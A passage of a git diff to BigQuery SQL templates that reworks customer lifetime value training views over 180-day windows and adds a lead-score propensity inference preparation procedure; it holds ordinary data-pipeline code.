feature_date ORDER BY feature_date DESC) AS checkouts_past_120_150_day, - -- Extracts the latest number of checkouts in the past 150-180 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(checkouts_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_150_180_day, - -- Extracts the latest projected lifetime value (PLTV) revenue for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(pltv_revenue_180_days ) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS pltv_revenue_180_days - FROM `{{project_id}}.{{dataset}}.{{insert_table}}` - -- Filters for users with a PLTV revenue greater than zero. - WHERE pltv_revenue_180_days > 0.0 -); - --- Creates the final view containing input data for the CLTV model looking back 180 days to predict 30 days. -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_training_180_30` -(processed_timestamp, - data_split, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - pltv_revenue_30_days) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL {{expiration_duration_hours}} HOUR), - friendly_name="v_customer_lifetime_value_training_180_30", - description="View Purchase Propensity Training dataset using 15 days back to predict 15 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - * EXCEPT(feature_date, row_order_peruser_persplit) -FROM ( -SELECT DISTINCT - processed_timestamp, - data_split, - feature_date, - user_pseudo_id, - user_id, - -- Now, I want to skip rows per user, per split every 30 days. - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date ASC) AS row_order_peruser_persplit, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - pltv_revenue_30_days -FROM( -SELECT DISTINCT - processed_timestamp, - data_split, - feature_date, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - pltv_revenue_30_days, - -- Row number for each user pseudo id, feature date and data split combination ordered by feature date descending. - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split ORDER BY feature_date DESC) AS row_order_peruser_perday_persplit - FROM `{{project_id}}.{{dataset}}.customer_lifetime_value_training_180_30` -) -WHERE - -- Filter 1 example ordered descending - row_order_peruser_perday_persplit = 1 -) -WHERE - -- Skipping windows each 30 days, which is the future window size. - MOD(row_order_peruser_persplit-1, 30) = 0; - - --- Creates the final view containing input data for the CLTV model looking back 180 days to predict 90 days. -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_training_180_90` -(processed_timestamp, - data_split, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - pltv_revenue_90_days) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL {{expiration_duration_hours}} HOUR), - friendly_name="v_customer_lifetime_value_training_180_90", - description="View Purchase Propensity Training dataset using 15 days back to predict 7 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - * EXCEPT(feature_date, row_order_peruser_persplit) -FROM ( -SELECT DISTINCT - processed_timestamp, - data_split, - feature_date, - user_pseudo_id, - user_id, - -- Now, I want to skip rows per user, per split every 15 days. - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date ASC) AS row_order_peruser_persplit, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - pltv_revenue_90_days -FROM( -SELECT DISTINCT - processed_timestamp, - data_split, - feature_date, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - pltv_revenue_90_days, - -- Number of rows per user, per day, per split. Only one row per user, per day, per split. - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split ORDER BY feature_date DESC) AS row_order_peruser_perday_persplit - FROM `{{project_id}}.{{dataset}}.customer_lifetime_value_training_180_90` -) -WHERE - -- Filter 1 example ordered descending - row_order_peruser_perday_persplit = 1 -) -WHERE - -- Skipping windows of 90 days, which is the future window size. - MOD(row_order_peruser_persplit-1, 90) = 0; - --- Creates the final view containing input data for the CLTV model looking back 180 days to predict 180 days. -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_training_180_180` -(processed_timestamp, +-- Creates the final view containing input data for the CLTV model looking back 180 days to predict 30 days. +CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_training_180_30` +(processed_timestamp, data_split, user_pseudo_id, user_id, @@ -1292,23 +621,23 @@ CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_tra checkouts_past_90_120_day, checkouts_past_120_150_day, checkouts_past_150_180_day, - pltv_revenue_180_days) + pltv_revenue_30_days) OPTIONS( --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL {{expiration_duration_hours}} HOUR), - friendly_name="v_customer_lifetime_value_training_180_180", - description="View Purchase Propensity Training dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", + friendly_name="v_customer_lifetime_value_training_180_30", + description="View Purchase Propensity Training dataset using 15 days back to predict 15 days ahead. View expires after 48h and should run daily.", labels=[("org_unit", "development")] -) AS +) AS SELECT DISTINCT * EXCEPT(feature_date, row_order_peruser_persplit) -FROM ( +FROM ( SELECT DISTINCT processed_timestamp, data_split, feature_date, user_pseudo_id, user_id, - -- Now, I want to skip rows per user, per split every 15 days. + -- Now, I want to skip rows per user, per split every 30 days. ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date ASC) AS row_order_peruser_persplit, device_category, device_mobile_brand_name, @@ -1364,7 +693,7 @@ SELECT DISTINCT checkouts_past_90_120_day, checkouts_past_120_150_day, checkouts_past_150_180_day, - pltv_revenue_180_days + pltv_revenue_30_days FROM( SELECT DISTINCT processed_timestamp, @@ -1426,20 +755,19 @@ SELECT DISTINCT checkouts_past_90_120_day, checkouts_past_120_150_day, checkouts_past_150_180_day, - pltv_revenue_180_days, - -- Number of rows per user, per day, per split. Only one row per user, per day, per slip. + pltv_revenue_30_days, + -- Row number for each user pseudo id, feature date and data split combination ordered by feature date descending. ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split ORDER BY feature_date DESC) AS row_order_peruser_perday_persplit - FROM `{{project_id}}.{{dataset}}.customer_lifetime_value_training_180_180` + FROM `{{project_id}}.{{dataset}}.customer_lifetime_value_training_180_30` ) WHERE -- Filter 1 example ordered descending row_order_peruser_perday_persplit = 1 ) WHERE - -- Skipping windows of 30 days, which is the future window size. + -- Skipping windows each 30 days, which is the future window size. MOD(row_order_peruser_persplit-1, 30) = 0; - -- Creates the final view containing input data for the CLTV model looking back 180 days to predict 30 days. -- Consider only the last windows per user. So that we can use only the most recent interactions of users. CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_training_180_30_last_window` @@ -1638,165 +966,3 @@ SELECT DISTINCT WHERE -- Filter 1 example ordered descending user_row_order = 1; - --- Creates the final view containing balanced input data for the CLTV model looking back 180 days to predict 30 days. -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_training_180_30_balanced` -(data_split, - user_pseudo_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - pltv_revenue_30_days) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL {{expiration_duration_hours}} HOUR), - friendly_name="v_customer_lifetime_value_training_180_30_balanced", - description="View Purchase Propensity Training dataset using 15 days back to predict 15 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS --- This query performs a stratified random sampling of users from the v_customer_lifetime_value_training_180_30 table, --- ensuring that the final dataset has a balanced representation of users across different PLTV revenue ranges. --- This balanced dataset is then used for training and validating a CLTV model. -SELECT DISTINCT - data_split, - user_pseudo_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - pltv_revenue_30_days -FROM -( -SELECT -* EXCEPT(rn) FROM ( -SELECT - *, - -- Calculates a unique row number (rn) for each row within each bucket. - -- The PARTITION BY bucket ensures that the numbering is independent for each bucket. - -- The ORDER BY RAND() randomizes the order of rows within each bucket. - ROW_NUMBER() OVER (PARTITION BY bucket ORDER BY RAND()) AS rn -FROM ( - SELECT - *, - -- Creates a new column called bucket by categorizing users into 10 buckets based on - -- their pltv_revenue_30_days (predicted lifetime value revenue over the next 30 days). - CASE - WHEN pltv_revenue_30_days < 50 THEN "bucket1" - WHEN pltv_revenue_30_days BETWEEN 50 AND 100 THEN "bucket2" - WHEN pltv_revenue_30_days BETWEEN 100 AND 200 THEN "bucket3" - WHEN pltv_revenue_30_days BETWEEN 200 AND 300 THEN "bucket4" - WHEN pltv_revenue_30_days BETWEEN 300 AND 400 THEN "bucket5" - WHEN pltv_revenue_30_days BETWEEN 400 AND 500 THEN "bucket6" - WHEN pltv_revenue_30_days BETWEEN 500 AND 750 THEN "bucket7" - WHEN pltv_revenue_30_days BETWEEN 750 AND 1000 THEN "bucket8" - WHEN pltv_revenue_30_days BETWEEN 1000 AND 2000 THEN "bucket9" - WHEN pltv_revenue_30_days > 2000 THEN "bucket10" END as bucket - FROM - `{{project_id}}.{{dataset}}.v_customer_lifetime_value_training_180_30`) -) -WHERE - -- This filter selects only the first 1000 rows from each bucket. - -- This is a form of stratified sampling, ensuring that the final dataset has a - -- balanced representation of users across different PLTV revenue ranges - rn <= 1000) -; diff --git a/sql/procedure/lead_score_propensity_inference_preparation.sqlx b/sql/procedure/lead_score_propensity_inference_preparation.sqlx new file mode 100644 index 00000000..d9753b88 --- /dev/null +++ b/sql/procedure/lead_score_propensity_inference_preparation.sqlx @@ -0,0 +1,352 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +DECLARE lastest_processed_time_ud TIMESTAMP; +DECLARE lastest_processed_time_useam TIMESTAMP; +DECLARE lastest_processed_time_uwlm TIMESTAMP; +DECLARE lastest_processed_time_um TIMESTAMP; + +-- Setting procedure to lookback from the day before `inference_date` +SET inference_date = DATE_SUB(inference_date, INTERVAL 1 DAY); + +SET lastest_processed_time_ud = (SELECT MAX(processed_timestamp) FROM `{{feature_store_project_id}}.{{feature_store_dataset}}.user_dimensions` WHERE feature_date = inference_date LIMIT 1); +SET lastest_processed_time_useam = (SELECT MAX(processed_timestamp) FROM `{{feature_store_project_id}}.{{feature_store_dataset}}.user_session_event_aggregated_metrics` WHERE feature_date = inference_date LIMIT 1); +SET lastest_processed_time_uwlm = (SELECT MAX(processed_timestamp) FROM `{{feature_store_project_id}}.{{feature_store_dataset}}.user_rolling_window_lead_metrics` WHERE feature_date = inference_date LIMIT 1); +SET lastest_processed_time_um = (SELECT MAX(processed_timestamp) FROM `{{feature_store_project_id}}.{{feature_store_dataset}}.user_scoped_metrics` WHERE feature_date = inference_date LIMIT 1); + +CREATE OR REPLACE TEMP TABLE inference_preparation_ud as ( + SELECT DISTINCT + -- The user pseudo id + UD.user_pseudo_id, + -- The user id + MAX(UD.user_id) OVER(user_dimensions_window) AS user_id, + -- The feature date + UD.feature_date, + -- The user lifetime value revenue + MAX(UD.user_ltv_revenue) OVER(user_dimensions_window) AS user_ltv_revenue, + -- The device category + MAX(UD.device_category) OVER(user_dimensions_window) AS device_category, + -- The device brand name + MAX(UD.device_mobile_brand_name) OVER(user_dimensions_window) AS device_mobile_brand_name, + -- The device model name + MAX(UD.device_mobile_model_name) OVER(user_dimensions_window) AS device_mobile_model_name, + -- The device operating system + MAX(UD.device_os) OVER(user_dimensions_window) AS device_os, + -- The device language + MAX(UD.device_language) OVER(user_dimensions_window) AS device_language, + -- The device web browser + MAX(UD.device_web_browser) OVER(user_dimensions_window) AS device_web_browser, + -- The user sub continent + MAX(UD.geo_sub_continent) OVER(user_dimensions_window) AS geo_sub_continent, + -- The user country + MAX(UD.geo_country) OVER(user_dimensions_window) AS geo_country, + -- The user region + MAX(UD.geo_region) OVER(user_dimensions_window) AS geo_region, + -- The user city + MAX(UD.geo_city) OVER(user_dimensions_window) AS geo_city, + -- The user metro + MAX(UD.geo_metro) OVER(user_dimensions_window) AS geo_metro, + -- The user last traffic source medium + MAX(UD.last_traffic_source_medium) OVER(user_dimensions_window) AS last_traffic_source_medium, + -- The user last traffic source name + MAX(UD.last_traffic_source_name) OVER(user_dimensions_window) AS last_traffic_source_name, + -- The user last traffic source source + MAX(UD.last_traffic_source_source) OVER(user_dimensions_window) AS last_traffic_source_source, + -- The user first traffic source medium + MAX(UD.first_traffic_source_medium) OVER(user_dimensions_window) AS first_traffic_source_medium, + -- The user first traffic source name + MAX(UD.first_traffic_source_name) OVER(user_dimensions_window) AS first_traffic_source_name, + -- The user first traffic source source + MAX(UD.first_traffic_source_source) OVER(user_dimensions_window) AS first_traffic_source_source, + -- Whether the user has signed in with user ID + MAX(UD.has_signed_in_with_user_id) OVER(user_dimensions_window) AS has_signed_in_with_user_id, +FROM + `{{feature_store_project_id}}.{{feature_store_dataset}}.user_dimensions` UD +INNER JOIN + `{{project_id}}.{{mds_dataset}}.latest_event_per_user_last_72_hours` LEU +ON + UD.user_pseudo_id = LEU.user_pseudo_id +WHERE + -- In the future consider `feature_date BETWEEN start_date AND end_date`, to process multiple days. Modify Partition BY + UD.feature_date = inference_date + AND UD.processed_timestamp = lastest_processed_time_ud +WINDOW + user_dimensions_window AS (PARTITION BY UD.user_pseudo_id ROWS BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING) +); + + +CREATE OR REPLACE TEMP TABLE inference_preparation_uwlm as ( + SELECT DISTINCT + -- User pseudo id + UWLM.user_pseudo_id, + -- Feature date + UWLM.feature_date{% for feature in short_list_features %}, + -- Calculate the maximum value for each metric over the window + MAX(UWLM.{{feature.feature_name}}_past_1_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_1_day, + MAX(UWLM.{{feature.feature_name}}_past_2_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_2_day, + MAX(UWLM.{{feature.feature_name}}_past_3_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_3_day, + MAX(UWLM.{{feature.feature_name}}_past_4_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_4_day, + MAX(UWLM.{{feature.feature_name}}_past_5_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_5_day{% endfor %} +FROM + `{{feature_store_project_id}}.{{feature_store_dataset}}.user_rolling_window_lead_metrics` UWLM +INNER JOIN + `{{project_id}}.{{mds_dataset}}.latest_event_per_user_last_72_hours` LEU +ON + UWLM.user_pseudo_id = LEU.user_pseudo_id +WHERE + -- Filter for the features in the inferecen date + UWLM.feature_date = inference_date + AND UWLM.processed_timestamp = lastest_processed_time_uwlm +WINDOW + user_rolling_lead_window AS (PARTITION BY UWLM.user_pseudo_id ROWS BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING) +); + +-- This is a temp table consolidating all features over the dates intervals. +CREATE OR REPLACE TEMP TABLE inference_preparation as ( + SELECT DISTINCT + UD.user_pseudo_id, + UD.user_id, + UD.feature_date, + UD.user_ltv_revenue, + UD.device_category, + UD.device_mobile_brand_name, + UD.device_mobile_model_name, + UD.device_os, + UD.device_language, + UD.device_web_browser, + UD.geo_sub_continent, + UD.geo_country, + UD.geo_region, + UD.geo_city, + UD.geo_metro, + UD.last_traffic_source_medium, + UD.last_traffic_source_name, + UD.last_traffic_source_source, + UD.first_traffic_source_medium, + UD.first_traffic_source_name, + UD.first_traffic_source_source, + UD.has_signed_in_with_user_id{% for feature in short_list_features %}, + UWLM.{{feature.feature_name}}_past_1_day, + UWLM.{{feature.feature_name}}_past_2_day, + UWLM.{{feature.feature_name}}_past_3_day, + UWLM.{{feature.feature_name}}_past_4_day, + UWLM.{{feature.feature_name}}_past_5_day{% endfor %} +FROM + inference_preparation_ud UD +INNER JOIN + inference_preparation_uwlm UWLM +ON + UWLM.user_pseudo_id = UD.user_pseudo_id + AND UWLM.feature_date = UD.feature_date +); + +DELETE FROM `{{project_id}}.{{dataset}}.{{insert_table}}` WHERE TRUE; + +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +( + feature_date, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id{% for feature in short_list_features %}, + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day{% endfor %} +) +SELECT DISTINCT +feature_date, + user_pseudo_id, + user_id, + MIN(user_ltv_revenue) OVER(PARTITION BY user_pseudo_id, feature_date) as user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id{% for feature in short_list_features %}, + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day{% endfor %} +FROM inference_preparation; + + +CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.lead_score_propensity_inference_5_1` AS( + SELECT DISTINCT + CURRENT_TIMESTAMP() AS processed_timestamp, + feature_date, + user_pseudo_id, + LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_id, + LAST_VALUE(user_ltv_revenue) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_ltv_revenue, + LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_category, + LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_mobile_brand_name, + LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_mobile_model_name, + LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_os, + LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_language, + LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_web_browser, + LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_sub_continent, + LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_country, + LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_region, + LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_city, + LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_metro, + LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS last_traffic_source_medium, + LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY 